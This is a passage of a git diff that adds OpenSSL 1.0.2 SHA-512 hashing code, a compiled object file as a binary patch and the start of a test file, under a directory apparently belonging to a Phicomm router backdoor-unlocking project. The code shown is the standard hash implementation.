+                                : "cc"); ret;           })
+#     if !defined(B_ENDIAN)
+#      define PULL64(x) ({ SHA_LONG64 ret=*((const SHA_LONG64 *)(&(x)));  \
+                                asm ("bswapq    %0"             \
+                                : "=r"(ret)                     \
+                                : "0"(ret)); ret;               })
+#     endif
+#    elif (defined(__i386) || defined(__i386__)) && !defined(B_ENDIAN)
+#     if defined(I386_ONLY)
+#      define PULL64(x) ({ const unsigned int *p=(const unsigned int *)(&(x));\
+                         unsigned int hi=p[0],lo=p[1];          \
+                                asm("xchgb %%ah,%%al;xchgb %%dh,%%dl;"\
+                                    "roll $16,%%eax; roll $16,%%edx; "\
+                                    "xchgb %%ah,%%al;xchgb %%dh,%%dl;" \
+                                : "=a"(lo),"=d"(hi)             \
+                                : "0"(lo),"1"(hi) : "cc");      \
+                                ((SHA_LONG64)hi)<<32|lo;        })
+#     else
+#      define PULL64(x) ({ const unsigned int *p=(const unsigned int *)(&(x));\
+                         unsigned int hi=p[0],lo=p[1];          \
+                                asm ("bswapl %0; bswapl %1;"    \
+                                : "=r"(lo),"=r"(hi)             \
+                                : "0"(lo),"1"(hi));             \
+                                ((SHA_LONG64)hi)<<32|lo;        })
+#     endif
+#    elif (defined(_ARCH_PPC) && defined(__64BIT__)) || defined(_ARCH_PPC64)
+#     define ROTR(a,n)    ({ SHA_LONG64 ret;              \
+                                asm ("rotrdi %0,%1,%2"  \
+                                : "=r"(ret)             \
+                                : "r"(a),"K"(n)); ret;  })
+#    elif defined(__aarch64__)
+#     define ROTR(a,n)    ({ SHA_LONG64 ret;              \
+                                asm ("ror %0,%1,%2"     \
+                                : "=r"(ret)             \
+                                : "r"(a),"I"(n)); ret;  })
+#     if  defined(__BYTE_ORDER__) && defined(__ORDER_LITTLE_ENDIAN__) && \
+        __BYTE_ORDER__==__ORDER_LITTLE_ENDIAN__
+#      define PULL64(x)   ({ SHA_LONG64 ret;                      \
+                                asm ("rev       %0,%1"          \
+                                : "=r"(ret)                     \
+                                : "r"(*((const SHA_LONG64 *)(&(x))))); ret;             })
+#     endif
+#    endif
+#   elif defined(_MSC_VER)
+#    if defined(_WIN64)         /* applies to both IA-64 and AMD64 */
+#     pragma intrinsic(_rotr64)
+#     define ROTR(a,n)    _rotr64((a),n)
+#    endif
+#    if defined(_M_IX86) && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+#     if defined(I386_ONLY)
+static SHA_LONG64 __fastcall __pull64be(const void *x)
+{
+    _asm mov edx,[ecx + 0]
+    _asm mov eax,[ecx + 4]
+_asm xchg dh, dl
+        _asm xchg ah, al
+        _asm rol edx, 16 _asm rol eax, 16 _asm xchg dh, dl _asm xchg ah, al}
+#     else
+static SHA_LONG64 __fastcall __pull64be(const void *x)
+{
+    _asm mov edx,[ecx + 0]
+    _asm mov eax,[ecx + 4]
+_asm bswap edx _asm bswap eax}
+#     endif
+#     define PULL64(x) __pull64be(&(x))
+#     if _MSC_VER<=1200
+#      pragma inline_depth(0)
+#     endif
+#    endif
+#   endif
+#  endif
+#  ifndef PULL64
+#   define B(x,j)    (((SHA_LONG64)(*(((const unsigned char *)(&x))+j)))<<((7-j)*8))
+#   define PULL64(x) (B(x,0)|B(x,1)|B(x,2)|B(x,3)|B(x,4)|B(x,5)|B(x,6)|B(x,7))
+#  endif
+#  ifndef ROTR
+#   define ROTR(x,s)       (((x)>>s) | (x)<<(64-s))
+#  endif
+#  define Sigma0(x)       (ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
+#  define Sigma1(x)       (ROTR((x),14) ^ ROTR((x),18) ^ ROTR((x),41))
+#  define sigma0(x)       (ROTR((x),1)  ^ ROTR((x),8)  ^ ((x)>>7))
+#  define sigma1(x)       (ROTR((x),19) ^ ROTR((x),61) ^ ((x)>>6))
+#  define Ch(x,y,z)       (((x) & (y)) ^ ((~(x)) & (z)))
+#  define Maj(x,y,z)      (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z)))
+#  if defined(__i386) || defined(__i386__) || defined(_M_IX86)
+/*
+ * This code should give better results on 32-bit CPU with less than
+ * ~24 registers, both size and performance wise...
+ */ static void sha512_block_data_order(SHA512_CTX *ctx, const void *in,
+                                        size_t num)
+{
+    const SHA_LONG64 *W = in;
+    SHA_LONG64 A, E, T;
+    SHA_LONG64 X[9 + 80], *F;
+    int i;
+
+    while (num--) {
+
+        F = X + 80;
+        A = ctx->h[0];
+        F[1] = ctx->h[1];
+        F[2] = ctx->h[2];
+        F[3] = ctx->h[3];
+        E = ctx->h[4];
+        F[5] = ctx->h[5];
+        F[6] = ctx->h[6];
+        F[7] = ctx->h[7];
+
+        for (i = 0; i < 16; i++, F--) {
+#   ifdef B_ENDIAN
+            T = W[i];
+#   else
+            T = PULL64(W[i]);
+#   endif
+            F[0] = A;
+            F[4] = E;
+            F[8] = T;
+            T += F[7] + Sigma1(E) + Ch(E, F[5], F[6]) + K512[i];
+            E = F[3] + T;
+            A = T + Sigma0(A) + Maj(A, F[1], F[2]);
+        }
+
+        for (; i < 80; i++, F--) {
+            T = sigma0(F[8 + 16 - 1]);
+            T += sigma1(F[8 + 16 - 14]);
+            T += F[8 + 16] + F[8 + 16 - 9];
+
+            F[0] = A;
+            F[4] = E;
+            F[8] = T;
+            T += F[7] + Sigma1(E) + Ch(E, F[5], F[6]) + K512[i];
+            E = F[3] + T;
+            A = T + Sigma0(A) + Maj(A, F[1], F[2]);
+        }
+
+        ctx->h[0] += A;
+        ctx->h[1] += F[1];
+        ctx->h[2] += F[2];
+        ctx->h[3] += F[3];
+        ctx->h[4] += E;
+        ctx->h[5] += F[5];
+        ctx->h[6] += F[6];
+        ctx->h[7] += F[7];
+
+        W += SHA_LBLOCK;
+    }
+}
+
+#  elif defined(OPENSSL_SMALL_FOOTPRINT)
+static void sha512_block_data_order(SHA512_CTX *ctx, const void *in,
+                                    size_t num)
+{
+    const SHA_LONG64 *W = in;
+    SHA_LONG64 a, b, c, d, e, f, g, h, s0, s1, T1, T2;
+    SHA_LONG64 X[16];
+    int i;
+
+    while (num--) {
+
+        a = ctx->h[0];
+        b = ctx->h[1];
+        c = ctx->h[2];
+        d = ctx->h[3];
+        e = ctx->h[4];
+        f = ctx->h[5];
+        g = ctx->h[6];
+        h = ctx->h[7];
+
+        for (i = 0; i < 16; i++) {
+#   ifdef B_ENDIAN
+            T1 = X[i] = W[i];
+#   else
+            T1 = X[i] = PULL64(W[i]);
+#   endif
+            T1 += h + Sigma1(e) + Ch(e, f, g) + K512[i];
+            T2 = Sigma0(a) + Maj(a, b, c);
+            h = g;
+            g = f;
+            f = e;
+            e = d + T1;
+            d = c;
+            c = b;
+            b = a;
+            a = T1 + T2;
+        }
+
+        for (; i < 80; i++) {
+            s0 = X[(i + 1) & 0x0f];
+            s0 = sigma0(s0);
+            s1 = X[(i + 14) & 0x0f];
+            s1 = sigma1(s1);
+
+            T1 = X[i & 0xf] += s0 + s1 + X[(i + 9) & 0xf];
+            T1 += h + Sigma1(e) + Ch(e, f, g) + K512[i];
+            T2 = Sigma0(a) + Maj(a, b, c);
+            h = g;
+            g = f;
+            f = e;
+            e = d + T1;
+            d = c;
+            c = b;
+            b = a;
+            a = T1 + T2;
+        }
+
+        ctx->h[0] += a;
+        ctx->h[1] += b;
+        ctx->h[2] += c;
+        ctx->h[3] += d;
+        ctx->h[4] += e;
+        ctx->h[5] += f;
+        ctx->h[6] += g;
+        ctx->h[7] += h;
+
+        W += SHA_LBLOCK;
+    }
+}
+
+#  else
+#   define ROUND_00_15(i,a,b,c,d,e,f,g,h)          do {    \
+        T1 += h + Sigma1(e) + Ch(e,f,g) + K512[i];      \
+        h = Sigma0(a) + Maj(a,b,c);                     \
+        d += T1;        h += T1;                } while (0)
+#   define ROUND_16_80(i,j,a,b,c,d,e,f,g,h,X)      do {    \
+        s0 = X[(j+1)&0x0f];     s0 = sigma0(s0);        \
+        s1 = X[(j+14)&0x0f];    s1 = sigma1(s1);        \
+        T1 = X[(j)&0x0f] += s0 + s1 + X[(j+9)&0x0f];    \
+        ROUND_00_15(i+j,a,b,c,d,e,f,g,h);               } while (0)
+static void sha512_block_data_order(SHA512_CTX *ctx, const void *in,
+                                    size_t num)
+{
+    const SHA_LONG64 *W = in;
+    SHA_LONG64 a, b, c, d, e, f, g, h, s0, s1, T1;
+    SHA_LONG64 X[16];
+    int i;
+
+    while (num--) {
+
+        a = ctx->h[0];
+        b = ctx->h[1];
+        c = ctx->h[2];
+        d = ctx->h[3];
+        e = ctx->h[4];
+        f = ctx->h[5];
+        g = ctx->h[6];
+        h = ctx->h[7];
+
+#   ifdef B_ENDIAN
+        T1 = X[0] = W[0];
+        ROUND_00_15(0, a, b, c, d, e, f, g, h);
+        T1 = X[1] = W[1];
+        ROUND_00_15(1, h, a, b, c, d, e, f, g);
+        T1 = X[2] = W[2];
+        ROUND_00_15(2, g, h, a, b, c, d, e, f);
+        T1 = X[3] = W[3];
+        ROUND_00_15(3, f, g, h, a, b, c, d, e);
+        T1 = X[4] = W[4];
+        ROUND_00_15(4, e, f, g, h, a, b, c, d);
+        T1 = X[5] = W[5];
+        ROUND_00_15(5, d, e, f, g, h, a, b, c);
+        T1 = X[6] = W[6];
+        ROUND_00_15(6, c, d, e, f, g, h, a, b);
+        T1 = X[7] = W[7];
+        ROUND_00_15(7, b, c, d, e, f, g, h, a);
+        T1 = X[8] = W[8];
+        ROUND_00_15(8, a, b, c, d, e, f, g, h);
+        T1 = X[9] = W[9];
+        ROUND_00_15(9, h, a, b, c, d, e, f, g);
+        T1 = X[10] = W[10];
+        ROUND_00_15(10, g, h, a, b, c, d, e, f);
+        T1 = X[11] = W[11];
+        ROUND_00_15(11, f, g, h, a, b, c, d, e);
+        T1 = X[12] = W[12];
+        ROUND_00_15(12, e, f, g, h, a, b, c, d);
+        T1 = X[13] = W[13];
+        ROUND_00_15(13, d, e, f, g, h, a, b, c);
+        T1 = X[14] = W[14];
+        ROUND_00_15(14, c, d, e, f, g, h, a, b);
+        T1 = X[15] = W[15];
+        ROUND_00_15(15, b, c, d, e, f, g, h, a);
+#   else
+        T1 = X[0] = PULL64(W[0]);
+        ROUND_00_15(0, a, b, c, d, e, f, g, h);
+        T1 = X[1] = PULL64(W[1]);
+        ROUND_00_15(1, h, a, b, c, d, e, f, g);
+        T1 = X[2] = PULL64(W[2]);
+        ROUND_00_15(2, g, h, a, b, c, d, e, f);
+        T1 = X[3] = PULL64(W[3]);
+        ROUND_00_15(3, f, g, h, a, b, c, d, e);
+        T1 = X[4] = PULL64(W[4]);
+        ROUND_00_15(4, e, f, g, h, a, b, c, d);
+        T1 = X[5] = PULL64(W[5]);
+        ROUND_00_15(5, d, e, f, g, h, a, b, c);
+        T1 = X[6] = PULL64(W[6]);
+        ROUND_00_15(6, c, d, e, f, g, h, a, b);
+        T1 = X[7] = PULL64(W[7]);
+        ROUND_00_15(7, b, c, d, e, f, g, h, a);
+        T1 = X[8] = PULL64(W[8]);
+        ROUND_00_15(8, a, b, c, d, e, f, g, h);
+        T1 = X[9] = PULL64(W[9]);
+        ROUND_00_15(9, h, a, b, c, d, e, f, g);
+        T1 = X[10] = PULL64(W[10]);
+        ROUND_00_15(10, g, h, a, b, c, d, e, f);
+        T1 = X[11] = PULL64(W[11]);
+        ROUND_00_15(11, f, g, h, a, b, c, d, e);
+        T1 = X[12] = PULL64(W[12]);
+        ROUND_00_15(12, e, f, g, h, a, b, c, d);
+        T1 = X[13] = PULL64(W[13]);
+        ROUND_00_15(13, d, e, f, g, h, a, b, c);
+        T1 = X[14] = PULL64(W[14]);
+        ROUND_00_15(14, c, d, e, f, g, h, a, b);
+        T1 = X[15] = PULL64(W[15]);
+        ROUND_00_15(15, b, c, d, e, f, g, h, a);
+#   endif
+
+        for (i = 16; i < 80; i += 16) {
+            ROUND_16_80(i, 0, a, b, c, d, e, f, g, h, X);
+            ROUND_16_80(i, 1, h, a, b, c, d, e, f, g, X);
+            ROUND_16_80(i, 2, g, h, a, b, c, d, e, f, X);
+            ROUND_16_80(i, 3, f, g, h, a, b, c, d, e, X);
+            ROUND_16_80(i, 4, e, f, g, h, a, b, c, d, X);
+            ROUND_16_80(i, 5, d, e, f, g, h, a, b, c, X);
+            ROUND_16_80(i, 6, c, d, e, f, g, h, a, b, X);
+            ROUND_16_80(i, 7, b, c, d, e, f, g, h, a, X);
+            ROUND_16_80(i, 8, a, b, c, d, e, f, g, h, X);
+            ROUND_16_80(i, 9, h, a, b, c, d, e, f, g, X);
+            ROUND_16_80(i, 10, g, h, a, b, c, d, e, f, X);
+            ROUND_16_80(i, 11, f, g, h, a, b, c, d, e, X);
+            ROUND_16_80(i, 12, e, f, g, h, a, b, c, d, X);
+            ROUND_16_80(i, 13, d, e, f, g, h, a, b, c, X);
+            ROUND_16_80(i, 14, c, d, e, f, g, h, a, b, X);
+            ROUND_16_80(i, 15, b, c, d, e, f, g, h, a, X);
+        }
+
+        ctx->h[0] += a;
+        ctx->h[1] += b;
+        ctx->h[2] += c;
+        ctx->h[3] += d;
+        ctx->h[4] += e;
+        ctx->h[5] += f;
+        ctx->h[6] += g;
+        ctx->h[7] += h;
+
+        W += SHA_LBLOCK;
+    }
+}
+
+#  endif
+
+# endif                         /* SHA512_ASM */
+
+#else                           /* !OPENSSL_NO_SHA512 */
+
+# if defined(PEDANTIC) || defined(__DECC) || defined(OPENSSL_SYS_MACOSX)
+static void *dummy = &dummy;
+# endif
+
+#endif                          /* !OPENSSL_NO_SHA512 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512.o
new file mode 100644
index 0000000000000000000000000000000000000000..65a3f9144f2efd6e26370835929f62cf54cc36a9
GIT binary patch
literal 10600
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
HL&yI&z*bZ+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512t.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512t.c
new file mode 100644
index 0000000..178882f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512t.c
@@ -0,0 +1,196 @@
